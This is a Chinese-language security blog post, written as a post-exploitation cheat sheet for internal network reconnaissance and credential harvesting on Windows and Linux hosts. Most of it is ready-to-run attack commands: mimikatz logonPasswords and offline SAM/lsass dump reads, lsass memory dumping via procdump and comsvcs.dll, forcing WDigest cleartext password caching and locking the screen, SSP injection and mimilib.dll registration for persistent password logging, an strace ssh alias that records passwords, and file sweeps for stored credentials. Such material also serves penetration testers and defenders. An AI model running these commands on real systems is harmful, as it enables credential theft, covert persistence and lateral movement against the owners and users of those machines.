

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" href="/img/avatar.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="守心">
  <meta name="keywords" content="">
  
    <meta name="description" content="windows查看当前系统信息 查看网段 查看进程是否存在杀软 查看是否存在域 定位域控 翻翻文件是否存有密码 基础信息123456789101112131415161718192021222324252627282930313233343536373839404142434445# 系统信息systeminfoecho %PROCESSOR_ARCHITECTURE%wmic OS get Ca">
<meta property="og:type" content="article">
<meta property="og:title" content="内网信息收集">
<meta property="og:url" content="https://liancccc.github.io/2024/09/15/%E6%8A%80%E6%9C%AF/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html">
<meta property="og:site_name" content="liancccc&#39;s blog">
<meta property="og:description" content="windows查看当前系统信息 查看网段 查看进程是否存在杀软 查看是否存在域 定位域控 翻翻文件是否存有密码 基础信息123456789101112131415161718192021222324252627282930313233343536373839404142434445# 系统信息systeminfoecho %PROCESSOR_ARCHITECTURE%wmic OS get Ca">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1310215391.cos.ap-beijing.myqcloud.com/images/image-20240622171658892-20241204151421-yy7jrnd.png">
<meta property="article:published_time" content="2024-09-15T13:23:28.000Z">
<meta property="article:modified_time" content="2026-03-03T04:33:23.330Z">
<meta property="article:author" content="守心">
<meta property="article:tag" content="内网渗透">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://blog-1310215391.cos.ap-beijing.myqcloud.com/images/image-20240622171658892-20241204151421-yy7jrnd.png">
  
  
  
  <title>内网信息收集 - liancccc&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/font.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"liancccc.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":false},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 50vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>liulipo&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/lbxx.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="内网信息收集"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-15 21:23" pubdate>
          2024年9月15日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    

    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">内网信息收集</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h2><p>查看当前系统信息</p>
<p>查看网段</p>
<p>查看进程是否存在杀软</p>
<p>查看是否存在域</p>
<p>定位域控</p>
<p>翻翻文件是否存有密码</p>
<h3 id="基础信息"><a href="#基础信息" class="headerlink" title="基础信息"></a>基础信息</h3><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs cmd"># 系统信息<br>systeminfo<br><span class="hljs-built_in">echo</span> <span class="hljs-variable">%PROCESSOR_ARCHITECTURE%</span><br>wmic OS get Caption,CSDVersion,OSArchitecture,Version<br>hostname<br><br># 用户信息<br>whoami /user<br>whoami /all<br><br># 网络信息<br><span class="hljs-built_in">ipconfig</span> /all<br>netstat -ano<br>route <span class="hljs-built_in">print</span><br>arp -a <br><br># https://forum.ywhack.com/bountytips.php?process<br># 查看进程<br>tasklist /svc<br># 杀掉进程<br><span class="hljs-built_in">taskkill</span> /F /IM 进程名<br><span class="hljs-built_in">taskkill</span> /F /PID 进程ID<br><br><br># 查看安装的软件<br>wmic product get name<br>wmic /Node:localhost /Namespace:\\root\SecurityCenter2 <span class="hljs-built_in">Path</span> AntiVirusProduct Get displayName /<span class="hljs-built_in">Format</span>:list<br><br># 查看用户信息<br><span class="hljs-built_in">net</span> user<br><span class="hljs-built_in">net</span> view<br><span class="hljs-built_in">net</span> localgroup administrators<br><span class="hljs-built_in">net</span> session<br><br># 存活探测<br><span class="hljs-keyword">for</span> /l %i <span class="hljs-keyword">in</span> (<span class="hljs-number">1</span>,<span class="hljs-number">1</span>,<span class="hljs-number">255</span>) <span class="hljs-keyword">do</span> @<span class="hljs-built_in">ping</span> -w <span class="hljs-number">2</span> -n <span class="hljs-number">1</span> <span class="hljs-number">172</span>.<span class="hljs-number">16</span>.<span class="hljs-number">107</span>.%i | <span class="hljs-built_in">findstr</span> &quot;TTL=&quot;<br><br># 查看 wifi 列表<br>netsh wlan show profiles<br># 查看指定 wifi 密码<br>netsh wlan show profiles wifi名 key=clear<br><br># rdp<br>reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&quot;<br>query user<br></code></pre></td></tr></table></figure>

<h3 id="域信息"><a href="#域信息" class="headerlink" title="域信息"></a>域信息</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">查询当前登录域及登录用户信息</span><br>net config workstation<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">定位域控</span><br>net time /domain<br>net group &quot;domain controllers&quot; /domain<br>nslookup -qt=ns domain<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询域内用户</span><br>net group &quot;domain users&quot; /domain<br>net user /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询域管理员</span><br>net localgroup administrators /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询指定域用户信息</span><br>net user test /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询域用户详细信息</span><br>wmic useraccount get /all<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询有几个域</span><br>net view /domain<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询域内主机</span><br>net group &quot;domain computers&quot; /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询域内的全局组和通用组</span><br>net group /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查找指定组含有哪些用户</span><br>net group &quot;domain admins&quot; /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查看域管理员,该组内的成员对域控拥有完全控制权</span><br>net group &quot;domain admins&quot; /domain<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查看企业管理组,该组内的成员对域控拥有完全控制权</span><br>net group &quot;enterprise admins&quot; /domain<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">查看用户 SID 和域 SID</span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">如用户的 SID 是: S-1-5-21-2189311154-2766837956-1982445477-520 则域 SID 则是去掉最后的 520</span><br>whoami /user<br></code></pre></td></tr></table></figure>

<h3 id="抓密码"><a href="#抓密码" class="headerlink" title="抓密码"></a>抓密码</h3><h4 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h4><p>本地认证流程：</p>
<ol>
<li>winlogon.exe：Windows Logon Process 用户登录程序</li>
<li>用户输入账号密码</li>
<li>lsass.exe：用于微软 Windows 系统的安全机制，用于本地安全和登陆策略</li>
<li>转换为 NTLM Hash 和 SAM 文件中的值相比</li>
</ol>
<p>所以抓密码就主要是在 lsass.exe 进程内存和 SAM 文件这两个地方获取，SAM 文件中只有 Hash，不过 Hash 可以尝试去在线网站解密，lsass.exe 内存是有可能获取明文密码的，不过当系统为 win10 或 2012R2 以上时，系统默认禁止在内存缓存中保存明文密码。</p>
<p>抓密码有在线和离线两种形式，在线就是直接使用 mimikatz 抓取，离线就是先保存 SAM 文件或者 lsass 内存转储文件，然后在下载到本地，在本地上面的 mimikatz 读取离线文件。都有利有弊，在线要考虑免杀问题，离线会出现文件过大或者传输问题。</p>
<h4 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">直接上传 mimikatz</span><br>mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonPasswords full&quot; exit<br><span class="hljs-meta prompt_"># </span><span class="language-bash">提升权限</span><br>privilege::debug<br><span class="hljs-meta prompt_"># </span><span class="language-bash">抓取密码</span><br>sekurlsa::logonPasswords <br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">cobaltstrike</span><br>hashdump<br>logonpasswords<br>mimikatz sekurlsa::logonpasswords<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">msf</span><br>load kiwi<br>creds_all<br>lsa_dump_sam<br>kiwi_cmd sekurlsa::logonpasswords<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">ms cs <span class="hljs-built_in">hash</span> 形式</span><br>用户名:用户SID:LM Hash:NTLM Hash:::<br></code></pre></td></tr></table></figure>

<h4 id="SAM"><a href="#SAM" class="headerlink" title="SAM"></a>SAM</h4><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs cmd"># 注册表保存<br>reg save hklm\sam sam.hive<br>reg save hklm\system system.hive<br><br># mimikatz 离线读取<br>mimikatz.exe &quot;privilege::debug&quot; &quot;lsadump::sam /system:system.hive /sam:sam.hive&quot; <span class="hljs-keyword">exit</span><br></code></pre></td></tr></table></figure>

<h4 id="lsass-exe"><a href="#lsass-exe" class="headerlink" title="lsass.exe"></a>lsass.exe</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">procdump 微软的工具</span> <br><span class="hljs-meta prompt_"># </span><span class="language-bash">https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump</span><br>procdump.exe -accepteula -ma lsass.exe lsass.dmp<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">rundll32 - 测试了几次都被没了</span><br>tasklist | findstr lsass.exe<br>powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump PID C:\lsass.dmp full<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">任务管理器找到 lsass.exe 进程, 右键<span class="hljs-string">&quot;创建内存转储文件&quot;</span></span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">mimikatz 离线读取</span><br>mimikatz.exe &quot;privilege::debug&quot;  &quot;sekurlsa::minidump lsass.dmp&quot; &quot;sekurlsa::logonPasswords full&quot; exit<br></code></pre></td></tr></table></figure>

<h4 id="抓取明文密码"><a href="#抓取明文密码" class="headerlink" title="抓取明文密码"></a>抓取明文密码</h4><p>一般来说横向移动直接用 Hash 就行了，远程登录也可以直接创建账户去登录，不是非得去获取明文。</p>
<p>要获取明文密码的话一般有两种形式：</p>
<ol>
<li>修改注册表开启允许在内存中保存密码，然后锁屏让对方重新登录，这个时候内存中就存储了明文密码，然后就可以通过 lsass.exe 抓取到明文密码</li>
<li>SSP 内存注入</li>
</ol>
<p>第一种方式需要对方当前正在登录，然后我们开启密码内存记录，锁屏后让对方重新登录，以获取明文密码。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">允许保存明文密码</span><br>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f<br><span class="hljs-meta prompt_"># </span><span class="language-bash">禁止保存明文密码</span><br>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">查询登录用户</span><br>query user<br><span class="hljs-meta prompt_"># </span><span class="language-bash">注销用户</span><br>logoff ID <br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">直接锁屏</span><br>powershell rundll32.exe user32.dll,LockWorkStation<br></code></pre></td></tr></table></figure>

<p>第二种方式算是一种权限维持的手段，可以把用户登录的明文密码记录到一个文件中。</p>
<p>也是有 2 种方式：</p>
<ol>
<li>通过 mimikatz 进行 SSP 内存注入：内存注入重启就没，但是锁屏就可以生效</li>
<li>注册表添加 SSP ：修改注册表，永久有效，但是需要重启机器后生效</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">mimikatz - 慎用,本地复现注入后重新登录不上...</span><br>mimikatz.exe &quot;privilege::debug&quot; &quot;misc::memssp&quot; exit<br>type C:\Windows\System32\mimilsa.log<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">注册表添加</span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">1. 把 Mimikatz 中的 mimilib.dll 文件复制到 C:\Windows\System32 目录下</span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">2. 修改注册表</span><br>reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v &quot;Security Packages&quot; /t REG_MULTI_SZ /d mimilib.dll /f<br><span class="hljs-meta prompt_"># </span><span class="language-bash">3. 重启</span><br>shutdown /r /t 0<br><span class="hljs-meta prompt_"># </span><span class="language-bash">4. 查看密码</span><br>type C:\Windows\System32\kiwissp.log<br></code></pre></td></tr></table></figure>

<p><img src="https://blog-1310215391.cos.ap-beijing.myqcloud.com/images/image-20240622171658892-20241204151421-yy7jrnd.png" srcset="/img/loading.gif" lazyload alt="image-20240622171658892"></p>
<h4 id="RDP凭据"><a href="#RDP凭据" class="headerlink" title="RDP凭据"></a>RDP凭据</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">查看 RDP 连接</span><br>reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&quot; /s<br>cmdkey /list<br></code></pre></td></tr></table></figure>

<h2 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h2><p>网络信息</p>
<p>历史命令 .bash_history</p>
<p>进程信息</p>
<p>web 目录 &#x2F;var&#x2F;www&#x2F;html</p>
<p>数据库</p>
<p>家目录</p>
<p>寻找密码、配置文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_"># </span><span class="language-bash">网络信息</span><br>ifconfig -a<br>ip addr show<br>route<br>ip route show<br>arp -a<br>cat /etc/resolv.conf<br>netstat -an<br>netstat -anltp | grep $PID<br>iptables -L<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">设备信息</span><br>uname -a<br>cat /etc/*-release<br>cat /etc/issue<br>hostname<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">用户 查看用户家目录</span><br>cat /etc/passwd<br>cat /etc/group<br>cat /etc/shadow<br>w # 当前登录<br>sudo -l<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">公钥信息</span><br>~/.ssh<br>/etc/ssh<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">环境信息</span><br>env<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">历史信息</span><br>history<br>cat ~/.bash_history<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">进程信息</span><br>ps aux<br>ps ef<br><span class="hljs-meta prompt_"># </span><span class="language-bash">资源占有情况</span> <br>top -c<br><span class="hljs-meta prompt_"># </span><span class="language-bash">查看进程关联文件</span> <br>lsof -c $PID<br><span class="hljs-meta prompt_"># </span><span class="language-bash">完整命令行信息</span> <br>cat /proc/$PID/cmdline<br><span class="hljs-meta prompt_"># </span><span class="language-bash">进程的命令名</span> <br>cat /proc/$PID/comm<br><span class="hljs-meta prompt_"># </span><span class="language-bash">进程的环境变量</span> <br>cat /proc/$PID/environ<br><span class="hljs-meta prompt_"># </span><span class="language-bash">进程打开文件的情况</span> <br>cat /proc/$PID/fd<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">计划任务</span><br>crontab -l<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">记录账号密码</span><br>alias ssh=&#x27;strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh&#x27;<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_"># </span><span class="language-bash">配置、密码收集 config 文件目录、.<span class="hljs-built_in">env</span> 文件 ...</span><br>find /home/nhapps/ -type f|xargs egrep -s -i  &quot;*user:|*user=|username:|username=|*pass:|*pass=|password:|password=|passwd:|passwd=|SYS|AUDSYS|SYSTEM&quot; --color &gt; password.txt<br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">查找所有带user和pass的txt</span><br>find / -type f  -name &quot;user*.txt&quot; -or -name &quot;pass*.txt&quot; 2&gt; /dev/null <br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">#</span><span class="language-bash">查找所有文件中的账号密码</span><br>grep -r -i -E &quot;user:|user=|username:|username=|pass:|pass=|password:|password=|passwd:|passwd=|账号：|账号:|用户名：|用户名:|密码：|密码:&quot; /var/www/html/sso --color<br></code></pre></td></tr></table></figure>

<h2 id="‍参考链接"><a href="#‍参考链接" class="headerlink" title="‍参考链接"></a>‍参考链接</h2><ul>
<li><a target="_blank" rel="noopener" href="https://websec.readthedocs.io/zh/latest/intranet/linux/info.html">https://websec.readthedocs.io/zh/latest/intranet/linux/info.html</a></li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%8A%80%E6%9C%AF/" class="category-chain-item">技术</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="print-no-link">#内网渗透</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>内网信息收集</div>
      <div>https://liancccc.github.io/2024/09/15/技术/内网渗透/内网信息收集/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>守心</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月15日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/12/28/%E6%8A%80%E6%9C%AF/%E6%BA%90%E7%A0%81%E5%AD%A6%E4%B9%A0/frp/" title="frp 源码学习">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">frp 源码学习</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/09/15/%E6%8A%80%E6%9C%AF/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/DumpHash/" title="DumpHash">
                        <span class="hidden-mobile">DumpHash</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
